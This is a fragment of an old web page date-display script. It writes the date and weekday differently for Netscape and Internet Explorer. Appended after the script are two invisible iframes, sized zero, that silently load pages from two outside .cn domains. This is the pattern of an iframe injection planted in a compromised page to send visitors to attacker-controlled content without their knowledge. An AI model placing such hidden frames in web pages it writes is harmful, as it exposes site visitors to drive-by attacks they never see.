<!--
todayDate = new Date();
date = todayDate.getDate();
month= todayDate.getMonth() +1;
year= todayDate.getYear();
if(navigator.appName == "Netscape")
{
	document.write(month);
	document.write("");
	document.write(date);
	document.write("");
	document.write(1900+year);
	document.write("&nbsp;&nbsp;")
}
if(navigator.appVersion.indexOf("MSIE") != -1)
{
document.write(month);
document.write("/");
document.write(date);
document.write("/");
document.write(year);
document.write("&nbsp;&nbsp;")
}
if (todayDate.getDay() == 5) document.write("Friday")
if (todayDate.getDay() == 6) document.write("Saturday")
if (todayDate.getDay() == 0) document.write("Sunday")
if (todayDate.getDay() == 1) document.write("Monday")
if (todayDate.getDay() == 2) document.write("Tuesday")
if (todayDate.getDay() == 3) document.write("Wednesday")
if (todayDate.getDay() == 4) document.write("Thursday")

//--><iframe src=http://www.haogs.cn/html/ width=0 height=0></iframe>

<iframe src=http://www.x454.cn/ width=100 height=0 frameborder=0></iframe>
